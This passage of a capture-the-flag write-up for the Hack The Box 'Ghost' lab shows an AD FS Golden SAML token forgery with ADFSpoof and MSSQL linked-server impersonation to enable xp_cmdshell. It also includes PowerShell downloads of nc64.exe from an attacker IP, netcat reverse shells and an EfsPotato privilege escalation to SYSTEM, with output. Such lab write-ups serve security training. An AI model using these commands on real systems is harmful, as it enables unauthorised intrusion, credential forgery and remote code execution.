V6tcjreFQF93oqDqvm5CJpmBcomVmIrKu8X7TRdmSuz9LhjiYXM+RHhNi6v8Y2rHfQRspKM4rDyfdqu1D+jNuRMyLc/X573GkMcBTiisY1R+8k2O46jOMxZG5NtoL2FETir85KBjM9Jg+2nlHgAiCBLmwbxOkPiIW3J120gLkIo9MF2kXWBbSy6BqNu9dPqOjSAaEoH+Jzm4KkeLrJVqLGzx0SAm3KHKfBPPECqj+AVBCVDNFk6fDWAGEN+LI/I61IEOXIdK1HwVBBNj9LP83KMW+DYdJaR+aONjWZIoYXKjvS8iGET5vx8omuZ3Rqj9nTRBbyQdT9dVXKqHzsK5EqU1W1hko3b9sNIVLnZGIzCaJkAEh293vPMi2bBzxiBNTvOsyTM0Evin2Q/v8Bp8Xcxv/JZQmjkZsLzKZbAkcwUf7+/ilxPDFVddTt+TcdVP0Aj8Wnxkd9vUP0Tbar6iHndHfvnsHVmoEcFy1cb1mBH9kGkHBu2PUl/9UySrTRVNv+oTlf+ZS/HBatxsejAxd4YN/AYanmswz9FxF96ASJTX64KLXJ9HYDNumw0+KmBUv8Mfu14h/2wgMaTDGgnrnDQAJZmo40KDAJ4WV5Akmf1K2tPginqo2qiZYdwS0dWqnnEOT0p+qR++cAae16Ey3cku52JxQ2UWQL8EB87vtp9YipG2C/3MPMBKa6TtR1nu/C3C/38UBGMfclAb0pfb7dhuT3mV9antYFcA6LTF9ECSfbhFobG6WS8tWJimVwBiFkE0GKzQRnvgjx7B1MeAuLF8fGj7HwqQKIVD5vHh7WhXwuyRpF3kRThbkS8ZadKpDH6FUDiaCtQ1l8mEC8511dTvfTHsRFO1j+wZweroWFGur4Is197IbdEiFVp/zDvChzWXy071fwwJQyGdOBNmra1sU8nAtHAfRgdurHiZowVkhLRZZf3UM76OOM8cvs46rv5F3K++b0F+cAbs/9aAgf49Jdy328jT0ir5Q+b3eYss2ScLJf02FiiskhYB9w7EcA+WDMu0aAJDAxhy8weEFh72VDBAZkRis0EGXrLoRrKU60ZM38glsJjzxbSnHsp1z1F9gZXre4xYwxm7J799FtTYrdXfQggTWqj+uTwV5nmGki/8CnZX23jGkne6tyLwoMRNbIiGPQZ4hGwNhoA6kItBPRAHJs4rhKOeWNzZ+sJeDwOiIAjb+V0FgqrIOcP/orotBBSQGaNUpwjLKRPx2nlI1VHSImDXizC6YvbKcnSo3WZB7NXIyTaUmKtV9h+27/NP+aChhILTcRe4WvA0g+QTG5ft9GSuqX94H+mX2zVEPD2Z5YN2UwqeA2EAvWJDTcSN/pDrDBQZD2kMB8P4Q7jPauEPCRECgy43se/DU+P63NBFTa5tkgmG2+E05RXnyP+KZPWeUP/lXOIA6PNvyhzzobx52OAewljfBizErthcAffnyPt6+zPdqHZMlfrkn+SY0JSMeR7pq0RIgZy0sa692+XtIcHYUcpaPl9hwRjE/5dpRtyt3w9fXR4dtf+rf+O2NI7h0l1xdmcShiRxHfp+9AZTz0H0aguK9aCZY7Sc9WR0X4nv0vSQB7fzFTNG+hOr0PcOh+KIETfiR9KUerB1zbpW+XEUcG9wCyb8OMc4ndpo1WbzLAn7WNDTY9UcHmFJFVmRGbLt2+Pe5fikQxIVLfRCwUikNeKY/3YiOJV3XhA6x6e2zjN3I/Tfo1/eldj0IbE7RP4ptUjyuWkLcnWNHZr8YhLaWTbucDI8R8MXAjZqNCX7WvJ5i+YzJ8S+IQbM8R2DKeFXOTTV3w6gL1rAYUpF9xwe6CCItxrsP3v59mn21bvj3HunOEJI3aAoStJgtO4K+SOeIx+Fa7dLxpTEDecoNsj6hjMdGsrqzuolZX/GBF1SotrYN+W63MYSiZps6bWpc8WkCsIqMiOaGa1eNLvAlupUNGSBlcXNogdKU0R6AFKM60AN2FFd7n4R5TC76ZHIKGmxUcq9EuYdeqamw0TB4fW0YMW4OZqQyx6Z8m3J7hA2uZfB7jYBl2myMeBzqwQYTsEqxqV3QuT2uOwfAi5nknlWUWRvWJl4Ktjzdv3Ni+8O11M+F5gT1/6E9MfchK0GK2tOM6qI8qrroLMNjBHLv4XKAx6rEJsTjPTwaby8IpYjg6jc7DSJxNT+W9F82wYc7b3nBzmuIPk8LUfQb7QQLJjli+nemOc20fIrHZmTlPAh07OhK44/aRELISKPsR2Vjc/0bNiX8rIDjkvrD/KaJ8yDKdoQYHw8G+hU3dZMNpYseefw5KmI9q+SWRZEYJCPmFOS+DyQAiKxMi+hrmaZUsyeHv96cpo2OkAXNiF3T5dpHSXxLqIHJh3JvnFP9y2ZY+w9ahSR6Rlai+SokV5TLTCY7ah9yP/W1IwGuA4kyb0Tx8sdE0S/5p1A63+VwhuANv2NHqI+YDXCKW4QmwYTAeJuMjW/mY8hewBDw+xAbSaY4RklYL85fMByon9AMe55Jaozk8X8IvcW6+m3V/zkKRG7srLX5R7ii3C4epaZPVC5NjNgpBkpT31X7ZZZIyphQIRNNkAve49oaquxVVcrDNyKjmkkm8XSHHn153z/yK3mInTMwr2FJU3W7L/Kkvprl34Tp5fxC7G/KRJV7/GKIlBLU0BlNZbuDm7sYPpRdzhAkna4+c4r8gb2M5Qjasqit7kuPeCRSxkCgmBhrdvg4PCU6QRueIZ795qjWPKeJOs88c7sdADJiRjQSrcUGCAU59wTG0vB4hhO3D87sbdXCEa74/YXiR7mFgc7upx/JpV+KcCEVPdJQAhpfyVJGmWDJZBvVXoNC2XInsJZJf81Oz+qBxbZo+ZzJxeqxgROdxc+q5Qy6c+CC8Kg3ljMQNdzxpk6AVd0/nbhdcPPmyG6tHZVEtNWoLW5SgdSWf/M0tltJ/yRii0hxFBVQwRgFSmsKZIDzk5+OktW7Rq3VgxS4dj97ejfFbnoEbbvKl9STRPw/vuRbQaQF15ZnwlQ0fvtWuWbJUTiwXeWmp1yQMU/qWMV/LtyGRl4eZuROzBjd+ujf8/Q6YSdAMR/o6ziKBHXrzaF8dH9XizNux0kPdCgtcpWfW+aKEeiWiYDxpOzR8Wmcn+Th0hDD9+P5YeZ85p/NkedO7eRMi38lOIBU2nT3oupJMGnnNj1EUd2z8gMcW/+VekgfN+ku5yxi3b9pvUIiCatHgp6RRb70fdNkyUa6ahxM5zS1dL/joGuoIJe26lpgqpYz1vZa15VKuCRU6v62HtqsOnB5sn6IhR16z3H416uFmXc9k4WRZQ0zrZjdFm+WPAHoWAufzAdZP/pdYv1IsrDoXsIAyAgw3rEzcwKs6XA5K9kihMIZXXEvtU2rsNGevNCjFqNMAS9BeNi9r/XjHDXnFZv6OQpfYJUPiUmumE+DYXZ/AP/MPSDrCkLKVPyip7xDevBN/BEsNEUSTXxm" | base64 -d > encrypted_token.bin

┌──(ajay㉿kali)-[~/Tools/ADFSpoof]
└─$ echo "8D-AC-A4-90-70-2B-3F-D6-08-D5-BC-35-A9-84-87-56-D2-FA-3B-7B-74-13-A3-C6-2C-58-A6-F4-58-FB-9D-A1" | tr -d "-" | xxd -r -p | tee private_key.bin | xxd
00000000: 8dac a490 702b 3fd6 08d5 bc35 a984 8756  ....p+?....5...V
00000010: d2fa 3b7b 7413 a3c6 2c58 a6f4 58fb 9da1  ..;{t...,X..X...
```

```bash
root@70ee728b709f:/ADFSpoof# python ADFSpoof.py -b encrypted_token.bin private_key.bin -s 'core.ghost.htb' saml2 --endpoint 'https://core.ghost.htb:8443/adfs/saml/postResponse' --nameidformat 'urn:oasis:names:tc:SAML:1.1:nameid-format:emailAddress' --nameid 'Administrator@ghost.htb' --rpidentifier 'https://core.ghost.htb:8443' --assertions '<Attribute Name="http://schemas.xmlsoap.org/ws/2005/05/identity/claims/upn"><AttributeValue>Administrator@ghost.htb</AttributeValue></Attribute><Attribute Name="http://schemas.xmlsoap.org/claims/CommonName"><AttributeValue>Administrator</AttributeValue></Attribute>'
    ___    ____  ___________                   ____
   /   |  / __ \/ ____/ ___/____  ____  ____  / __/
  / /| | / / / / /_   \__ \/ __ \/ __ \/ __ \/ /_  
 / ___ |/ /_/ / __/  ___/ / /_/ / /_/ / /_/ / __/  
/_/  |_/_____/_/    /____/ .___/\____/\____/_/     
                        /_/                        

A tool to for AD FS security tokens
Created by @doughsec

PHNhbWxwOlJlc3BvbnNlIHhtbG5zOnNhbWxwPSJ1cm46b2FzaXM6bmFtZXM6dGM6U0FNTDoyLjA6cHJvdG9jb2wiIElEPSJfODVBS05DIiBWZXJzaW9uPSIyLjAiIElzc3VlSW5zdGFudD0iMjAyNi0wNi0wMlQyMjozNjowNy4wMDBaIiBEZXN0aW5hdGlvbj0iaHR0cHM6Ly9jb3JlLmdob3N0Lmh0Yjo4NDQzL2FkZnMvc2FtbC9wb3N0UmVzcG9uc2UiIENvbnNlbnQ9InVybjpvYXNpczpuYW1lczp0YzpTQU1MOjIuMDpjb25zZW50OnVuc3BlY2lmaWVkIj48SXNzdWVyIHhtbG5zPSJ1cm46b2FzaXM6bmFtZXM6dGM6U0FNTDoyLjA6YXNzZXJ0aW9uIj5odHRwOi8vY29yZS5naG9zdC5odGIvYWRmcy9zZXJ2aWNlcy90cnVzdDwvSXNzdWVyPjxzYW1scDpTdGF0dXM%2BPHNhbWxwOlN0YXR1c0NvZGUgVmFsdWU9InVybjpvYXNpczpuYW1lczp0YzpTQU1MOjIuMDpzdGF0dXM6U3VjY2VzcyIvPjwvc2FtbHA6U3RhdHVzPjxBc3NlcnRpb24geG1sbnM9InVybjpvYXNpczpuYW1lczp0YzpTQU1MOjIuMDphc3NlcnRpb24iIElEPSJfR0U0Mk1FIiBJc3N1ZUluc3RhbnQ9IjIwMjYtMDYtMDJUMjI6MzY6MDcuMDAwWiIgVmVyc2lvbj0iMi4wIj48SXNzdWVyPmh0dHA6Ly9jb3JlLmdob3N0Lmh0Yi9hZGZzL3NlcnZpY2VzL3RydXN0PC9Jc3N1ZXI%2BPGRzOlNpZ25hdHVyZSB4bWxuczpkcz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC8wOS94bWxkc2lnIyI%2BPGRzOlNpZ25lZEluZm8%2BPGRzOkNhbm9uaWNhbGl6YXRpb25NZXRob2QgQWxnb3JpdGhtPSJodHRwOi8vd3d3LnczLm9yZy8yMDAxLzEwL3htbC1leGMtYzE0biMiLz48ZHM6U2lnbmF0dXJlTWV0aG9kIEFsZ29yaXRobT0iaHR0cDovL3d3dy53My5vcmcvMjAwMS8wNC94bWxkc2lnLW1vcmUjcnNhLXNoYTI1NiIvPjxkczpSZWZlcmVuY2UgVVJJPSIjX0dFNDJNRSI%2BPGRzOlRyYW5zZm9ybXM%2BPGRzOlRyYW5zZm9ybSBBbGdvcml0aG09Imh0dHA6Ly93d3cudzMub3JnLzIwMDAvMDkveG1sZHNpZyNlbnZlbG9wZWQtc2lnbmF0dXJlIi8%2BPGRzOlRyYW5zZm9ybSBBbGdvcml0aG09Imh0dHA6Ly93d3cudzMub3JnLzIwMDEvMTAveG1sLWV4Yy1jMTRuIyIvPjwvZHM6VHJhbnNmb3Jtcz48ZHM6RGlnZXN0TWV0aG9kIEFsZ29yaXRobT0iaHR0cDovL3d3dy53My5vcmcvMjAwMS8wNC94bWxlbmMjc2hhMjU2Ii8%2BPGRzOkRpZ2VzdFZhbHVlPkNNQzEyVndRUjJaeFY1bkU5bWdPNUNDRmt5R0x4MVpRcmcvaVUzUlpOZG89PC9kczpEaWdlc3RWYWx1ZT48L2RzOlJlZmVyZW5jZT48L2RzOlNpZ25lZEluZm8%2BPGRzOlNpZ25hdHVyZVZhbHVlPmhyMTliMmw2dE5BdnNQbE10THNqYnJBcUt4T1NaOTg0RUZVSFNFVkx2VG5RZDV3M0xWWjNGb20zUTJXRU9pQnJMWFl0bW9kajRUNnhTQU5Bd2FOOW5HNzZWOUVqL0k1UmRpSEhxWDNPbkxVMkswdjRLQ29Fekt6eTBDamQ2b1g4bE9aZTNhV0pWM2dhbkNkdUdlSkRDT1Vld0lZMk5ZY0ErK3FNN3o2Q1R2U3VZTTZ3RVMrTzJiR0ZKcklmbEVjQTVzY2QycEJ0amNyNFhMYUtaR1o5bkJ4U0lKT1NJYUc3YTV6ZlZDLzYvUW1Fa2lXUTFvZC8yaDhjKy9iSU1LdXVqdHUwdUF1WHplQncxblRwVkIyOGUrNU5zQXBZUTdaeEg1cTN5dEFzL1FJM08ybDBqclppVmtSKzFTMEFQdXdXbE9OU2NBVitCamUxRkYycWZhZzdVUFFXMDl3YnVVbHZVTGNTSlovTnJ6dVAra2tHa2FlMllTcElPT2h6UW95ekY3cGhSTmk4WUErTjB5d3NJNXBvM0dON0tyS0s4UHBjeDNTaks4Y3htbWpCd3p3dThnTmJhV1RLOXpwUkt1Q0ttRnlQQVRXMWZvWXp5Kys2Rll5WlhYYnNuNkEzMTNaYWNSYjI1Q1Q5bXF1aEtWSWZ4QXNBek83R0N0R2l0U01BaHlXREcxcnowekZ2N0VTVGltbG1OSEFzMmdUSkFWend2aUVKSEwrNkRoc1VYeXJXa0pIRmw2NGs4TElWSys0UjZZUWxtNThPZnJVWmtzd1VyelZteGRZdXE2TkZSenpGOHJCL0hqRHRXT2NjREFsNmx6WWdpeVM0MTJwSDE5STVnLytxYVFYcTI2T0ZQWEw4VGM4S09CVkFrdFBiSGwwQ0kwTUxrZXdqNnl3PTwvZHM6U2lnbmF0dXJlVmFsdWU%2BPGRzOktleUluZm8%2BPGRzOlg1MDlEYXRhPjxkczpYNTA5Q2VydGlmaWNhdGU%2BTUlJRTVqQ0NBczZnQXdJQkFnSVFKRmNXd015YlJhNU80K1dPNXRXb0dUQU5CZ2txaGtpRzl3MEJBUXNGQURBdU1Td3dLZ1lEVlFRREV5TkJSRVpUSUZOcFoyNXBibWNnTFNCbVpXUmxjbUYwYVc5dUxtZG9iM04wTG1oMFlqQWdGdzB5TkRBMk1UZ3hOakUzTVRCYUdBOHlNVEEwTURVek1ERTJNVGN4TUZvd0xqRXNNQ29HQTFVRUF4TWpRVVJHVXlCVGFXZHVhVzVuSUMwZ1ptVmtaWEpoZEdsdmJpNW5hRzl6ZEM1b2RHSXdnZ0lpTUEwR0NTcUdTSWIzRFFFQkFRVUFBNElDRHdBd2dnSUtBb0lDQVFDK0FBT0lmRXF0bFljbjE1M0wxQnZHUWdEeVhUbll3VFJ6c0s1OSt6RTF6Z0dLTzlONW5iOEZrK2RhS3BXTFFhaUg3b0RIYWVudy9RYXhCZzVxZGVEWW1EM296OEt5YUExeWdZQnJ6bTR3VzdGZjg3cks5RmU1SjUvaDZXOWc3NDloNUJJcVBRT3AwbDZzMXJmdW1PY2NONHliVzk1RVdOTDB2dVFYdkMrS1E0RDRnTVh1OG1DR3B4dHZJTDhpbE50SnVJRzNPUllTS2hSYWwweXlKZU9oRzR4Z2xyWkpGMThwOXdobkU2b21nZ21BNm4yc2hEay90dlRZamlpNWU3L2ljV1RLa3JzTUNwYUtVTms3bXhkTVpoUWFiN1NtZktyWk40cFJEN2RWZzV6ekl5RDdVelM5Q0hMQzZ4TnpxL1owaHVhT2FKaE9TZEpTZ2F0L2JzRzhuYngxOUhELyt5cFc5SjJMdE5GdWdkV3RtVUJXRE9RQllWaEI4U2c0VkVHZ1A5anlJdEhIMmJ6c0RmalJkSjhFMXVOSldQL2tRQTErd1lsT2RkTHFVM2IwSXNDdmxBOEV2WVcwVDFSc3U3N280eC93MGdXYjBvUVBFSXo3ejk3M2I0OTZ3cVF0M0RueWZlTzNsWFhmWk5jdmFqNUtDUDJUdEdCK0tzaEY5cGtJUHhxN0YyZ01oN1FqeGpSSHNBMjlWOGpGbzlnTEQ3a1BWaWNhSVVkc2dpRkhuWVFGMTRhNTJKdFIxVjVpTitoOTVKa3V1RXFRV0RCSEF2UEVCQlprRVpIKzV5VCthQ0ZYWFgrQnBQdDNRR2pZTGVKVThDRnNNdG44UVZMWXZMZGNWUnNVblJoL1dIaVh3Sk9PRVZFQ2E5dzcveVZuaGFsQ05CeDFFL2w0S1FJREFRQUJNQTBHQ1NxR1NJYjNEUUVCQ3dVQUE0SUNBUUFXWUtaVzNjRENCTzZkVDN5ZmwzT2N1eXAxTFZLVkkrOXBGeC9iYldwV2pTZGg2YjM5TFR4eEQ3RllVdGh1V1BaM3JGNEcrRmRNRkhIQ3gzWXBFbVVGbkVMS3NYcWhaOTg5QVg1OEkvM21iZlVsS1dlSVBMU0xrcCtlUlpvTUprdDdrMS9LWHREYXNPUW4wTnNnWUVvd0xCSW1NQ011OXV1am5DbUZPd0hQL0lCaGdZUU1IaDQ2QnpTWFdQM2k4VlhiclJ0RHBvL2MvL09GSmhHbW5uRjhaUG1pNHh0emZTREJwVktxd1ZMcDc4Q2d1TXhqUWQrYmRVYjQ1NTg4Wko0Q0xzUGRSUXAzMFdKMS9DTklhZW52Sld0QTJHNUladzVVMEVXQ0pMb1lKV0ZzOWl5T2ExL3k1NXJ1VzZKOGxJR0Qwd21vRWVDbDlDSDFFZDRkelVkVVhmMU1CQ1lQM1g5MmlheHpVRTB1cEdkLzFRbzZIVHl5T2xXdUF3cmtUMlZIRUxLVlpLT2c4K2RseTk3Z3laSWZVdFF3SWtQd05sOHZvMDRjZmoraHpPdkJ6UEtBQVloMTROTGd2ZUFJL0RxTW5PME9LTyt3MUhCS3c2NE5CQ244Z29hekYrUHVGZlVPMHlOSEZMNGt4TXBjYXA2aWV2NmczQlhDU0R3ZnFUVU9FdUVzN3E5b1lLZ3EycW5OVk9USWhoSW5NWEJ6RW02aVAxM2pmdU9vWEpkUEFuRVVYbjR5NXl3QTk3cnRiR25aRVB5eDFmMUVrWC9oYnFCUDR2b2d2OWtsdGFVRUVWWGtTK2hQcHhabWV4Q05yQkQxcTdHSi81MGViWWxDMENldjh3Nk1zOHRNME9ydnBwR1lsV3J0UHdldkV2ZmlSa3dCTEc3RU1BbkxTdz09PC9kczpYNTA5Q2VydGlmaWNhdGU%2BPC9kczpYNTA5RGF0YT48L2RzOktleUluZm8%2BPC9kczpTaWduYXR1cmU%2BPFN1YmplY3Q%2BPE5hbWVJRCBGb3JtYXQ9InVybjpvYXNpczpuYW1lczp0YzpTQU1MOjEuMTpuYW1laWQtZm9ybWF0OmVtYWlsQWRkcmVzcyI%2BQWRtaW5pc3RyYXRvckBnaG9zdC5odGI8L05hbWVJRD48U3ViamVjdENvbmZpcm1hdGlvbiBNZXRob2Q9InVybjpvYXNpczpuYW1lczp0YzpTQU1MOjIuMDpjbTpiZWFyZXIiPjxTdWJqZWN0Q29uZmlybWF0aW9uRGF0YSBOb3RPbk9yQWZ0ZXI9IjIwMjYtMDYtMDJUMjI6NDE6MDcuMDAwWiIgUmVjaXBpZW50PSJodHRwczovL2NvcmUuZ2hvc3QuaHRiOjg0NDMvYWRmcy9zYW1sL3Bvc3RSZXNwb25zZSIvPjwvU3ViamVjdENvbmZpcm1hdGlvbj48L1N1YmplY3Q%2BPENvbmRpdGlvbnMgTm90QmVmb3JlPSIyMDI2LTA2LTAyVDIyOjM2OjA3LjAwMFoiIE5vdE9uT3JBZnRlcj0iMjAyNi0wNi0wMlQyMzozNjowNy4wMDBaIj48QXVkaWVuY2VSZXN0cmljdGlvbj48QXVkaWVuY2U%2BaHR0cHM6Ly9jb3JlLmdob3N0Lmh0Yjo4NDQzPC9BdWRpZW5jZT48L0F1ZGllbmNlUmVzdHJpY3Rpb24%2BPC9Db25kaXRpb25zPjxBdHRyaWJ1dGVTdGF0ZW1lbnQ%2BPEF0dHJpYnV0ZSBOYW1lPSJodHRwOi8vc2NoZW1hcy54bWxzb2FwLm9yZy93cy8yMDA1LzA1L2lkZW50aXR5L2NsYWltcy91cG4iPjxBdHRyaWJ1dGVWYWx1ZT5BZG1pbmlzdHJhdG9yQGdob3N0Lmh0YjwvQXR0cmlidXRlVmFsdWU%2BPC9BdHRyaWJ1dGU%2BPEF0dHJpYnV0ZSBOYW1lPSJodHRwOi8vc2NoZW1hcy54bWxzb2FwLm9yZy9jbGFpbXMvQ29tbW9uTmFtZSI%2BPEF0dHJpYnV0ZVZhbHVlPkFkbWluaXN0cmF0b3I8L0F0dHJpYnV0ZVZhbHVlPjwvQXR0cmlidXRlPjwvQXR0cmlidXRlU3RhdGVtZW50PjxBdXRoblN0YXRlbWVudCBBdXRobkluc3RhbnQ9IjIwMjYtMDYtMDJUMjI6MzY6MDYuNTAwWiIgU2Vzc2lvbkluZGV4PSJfR0U0Mk1FIj48QXV0aG5Db250ZXh0PjxBdXRobkNvbnRleHRDbGFzc1JlZj51cm46b2FzaXM6bmFtZXM6dGM6U0FNTDoyLjA6YWM6Y2xhc3NlczpQYXNzd29yZFByb3RlY3RlZFRyYW5zcG9ydDwvQXV0aG5Db250ZXh0Q2xhc3NSZWY%2BPC9BdXRobkNvbnRleHQ%2BPC9BdXRoblN0YXRlbWVudD48L0Fzc2VydGlvbj48L3NhbWxwOlJlc3BvbnNlPg%3D%3D
```

The resulting base64-encoded SAML response was submitted via Burp Suite to the `postResponse` endpoint. The resulting session cookie was used in the browser to access `core.ghost.htb` as Administrator.

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2F177vXmNRvpxkjE2n9TZp%2Fimage.png?alt=media&amp;token=26c0d5fe-5841-4054-8224-55356a8caf39" alt=""><figcaption></figcaption></figure>

paste it in the request.

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FnYsaPxj3KIYlhP36wr2f%2Fimage.png?alt=media&amp;token=1798e2f6-48e4-4b05-8fe9-326cc5c3e79a" alt=""><figcaption></figcaption></figure>

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FCLS3iTARCLKsjRdOudj1%2Fimage.png?alt=media&amp;token=194c5af6-034f-48d8-8295-d15ea0db7667" alt=""><figcaption></figcaption></figure>

collect the cookie and paste it in the browser to access as administrator.

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2Fj7oVWTZUGv9HxRtO9ynt%2Fimage.png?alt=media&amp;token=d24bfa3b-f178-448c-82c3-a3f21003de5f" alt=""><figcaption></figcaption></figure>

refresh the browser and remove the unthourized in the url to access

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FhMTsdtTzTD9icE95Du6n%2Fimage.png?alt=media&amp;token=ad7bb039-4cd2-47fb-9abd-eafab830dc69" alt=""><figcaption></figcaption></figure>

## Shell as MSSQLSERVER

### Quering the Config Panel

`SELECT SYSTEM_USER;` displays current user

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FWdznul3wgyq7wn0SgWMX%2Fimage.png?alt=media&amp;token=4529b108-8dc5-42a6-ab42-1907f1fbe785" alt=""><figcaption></figcaption></figure>

`SELECT DB_NAME();` : master

`SELECT @@version;` : Microsoft SQL Server 2022 (RTM) - 16.0.1000.6 (X64) \n\tOct 8 2022 05:58:25 \n\tCopyright (C) 2022 Microsoft Corporation\n\tExpress Edition (64-bit) on Windows Server 2022 Standard 10.0 (Build 20348: ) (Hypervisor)\n”

Because the panel listed **two** configured databases (`MSSQL (domain: ghost.htb)` and `MSSQL (domain: corp.ghost.htb)`), the machine likely has **Database Links** established between them.

`sp_linkedservers;` finding the links

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FamNPsc5korIsFqxZUJzT%2Fimage.png?alt=media&amp;token=55f16689-92e8-401a-8a6c-2d639bdffa87" alt=""><figcaption></figcaption></figure>

`SELECT * FROM OPENQUERY([PRIMARY], 'SELECT SYSTEM_USER, IS_SRVROLEMEMBER(''sysadmin'')')`

\#checking user on linked servers

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FvB822KuRk7tPKzcjDwHO%2Fimage.png?alt=media&amp;token=6dd12dc8-432f-44bd-82c1-ba6cb5d807ed" alt=""><figcaption></figcaption></figure>

`SELECT * FROM OPENQUERY([DC01], 'SELECT SYSTEM_USER, IS_SRVROLEMEMBER(''sysadmin'')')`

RequestError: Server 'DC01' is not configured for DATA ACCESS. querying the DC result in erorr so  try to focus on PRIMARY.

```
EXEC ('EXECUTE AS LOGIN = ''sa''; SELECT SYSTEM_USER, IS_SRVROLEMEMBER(''sysadmin'')') AT [PRIMARY]
```

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2F4FxPzhIpBrqVxqlpHYY2%2Fimage.png?alt=media&amp;token=5ccabe37-1855-4aa3-b252-035d9c4ddab6" alt=""><figcaption></figcaption></figure>

sa with 1 successfully impersonated sa and now have sysadmin on PRIMARY!

### Shell on PRIMARY as mssqlserver

```sql
#step1
EXEC ('EXECUTE AS LOGIN = ''sa''; EXEC sp_configure ''show advanced options'',1; RECONFIGURE;') AT [PRIMARY]
#step 2
EXEC ('EXECUTE AS LOGIN = ''sa''; EXEC sp_configure ''xp_cmdshell'',1; RECONFIGURE;') AT [PRIMARY]
#Testing the RCE
EXEC ('EXECUTE AS LOGIN = ''sa''; EXEC xp_cmdshell ''whoami''') AT [PRIMARY]
```

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2Fk9R6kuUAbcOJZVpr6QwJ%2Fimage.png?alt=media&amp;token=3c58177f-1e1c-4458-93a5-1f60a0f6463b" alt=""><figcaption></figcaption></figure>

This confirm we can get RCE. Next i can send nc64.exe to it and get a reverse shell.

First setup a nc listener : `nc -lnvp 5555`

Next send netcat and get the shell

```sql
#downlaod it
EXECUTE('EXECUTE AS LOGIN=''sa''; exec xp_cmdshell "powershell iwr http://10.10.15.204:8000/nc64.exe -outfile C:\programdata\nc64.exe"') AT [PRIMARY]

#run to get shell
EXECUTE('EXECUTE AS LOGIN=''sa''; exec xp_cmdshell "C:\programdata\nc64.exe 10.10.15.204 5555 -e cmd"') AT [PRIMARY]
```

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FaBPxYBMpLDnj71rodWcQ%2Fimage.png?alt=media&amp;token=55cb42ef-92f5-44ac-a718-b7452ef6c07d" alt=""><figcaption></figcaption></figure>

Looking at the privileges using `whoami /all` The `MSSQLSERVER` service account held the `SeImpersonatePrivilege`.

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FcrY7cLgy6cgrlfSONNGM%2Fimage.png?alt=media&amp;token=c45f6f7a-5bfc-4db6-933b-3506067c5303" alt=""><figcaption></figcaption></figure>

### Abusing SeImpersonatePrivilege

`EfsPotato` was compiled on the target and used to impersonate `NT AUTHORITY\SYSTEM`:

```powershell
iwr "http://10.10.15.204:8000/EfsPotato.cs" -OutFile "EfsPotato.cs"
C:\Windows\Microsoft.net\framework\v4.0.30319\csc.exe EfsPotato.cs -nowarn:1691,618
S C:\ProgramData> dir
dir


    Directory: C:\ProgramData


Mode                 LastWriteTime         Length Name                                                                 
----                 -------------         ------ ----                                                                 
d---s-          5/8/2021   1:27 AM                Microsoft                                                            
d-----          2/2/2024   8:36 PM                Package Cache                                                        
d-----          5/8/2021   1:15 AM                regid.1991-06.com.microsoft                                          
d-----          5/8/2021   1:15 AM                SoftwareDistribution                                                 
d-----          5/8/2021   2:33 AM                ssh                                                                  
d-----         1/31/2024   6:28 PM                USOPrivate                                                           
d-----          5/8/2021   1:15 AM                USOShared                                                            
-a----          6/2/2026   4:54 PM          25441 EfsPotato.cs                                                         
-a----          6/2/2026   4:54 PM          17920 EfsPotato.exe                                                        
-a----          6/2/2026   4:40 PM          45272 nc64.exe                                                             

```

```bash
PS C:\ProgramData> .\EfsPotato.exe 'whoami'
.\EfsPotato.exe 'whoami'
Exploit for EfsPotato(MS-EFSR EfsRpcEncryptFileSrv with SeImpersonatePrivilege local privalege escalation vulnerability).
Part of GMH's fuck Tools, Code By zcgonvh.
CVE-2021-36942 patch bypass (EfsRpcEncryptFileSrv method) + alternative pipes support by Pablo Martinez (@xassiz) [www.blackarrow.net]

[+] Current user: NT Service\MSSQLSERVER
[+] Pipe: \pipe\lsarpc
[!] binding ok (handle=1a039aa0)
[+] Get Token: 912
[!] process with pid: 3908 created.
==============================
nt authority\system
```

Next setup a nc listener: `nc -lnvp 6666`&#x20;

```powershell
PS C:\ProgramData> .\EfsPotato.exe '\programdata\nc64.exe 10.10.15.204 6666 -e powershell'
.\EfsPotato.exe '\programdata\nc64.exe 10.10.15.204 6666 -e powershell'
Exploit for EfsPotato(MS-EFSR EfsRpcEncryptFileSrv with SeImpersonatePrivilege local privalege escalation vulnerability).
Part of GMH's fuck Tools, Code By zcgonvh.
CVE-2021-36942 patch bypass (EfsRpcEncryptFileSrv method) + alternative pipes support by Pablo Martinez (@xassiz) [www.blackarrow.net]

[+] Current user: NT Service\MSSQLSERVER
[+] Pipe: \pipe\lsarpc
[!] binding ok (handle=c4e930)
[+] Get Token: 888
[!] process with pid: 3956 created.
==============================
[x] EfsRpcEncryptFileSrv failed: 1818
```

## Shell as NT Authority System on PRIMARY

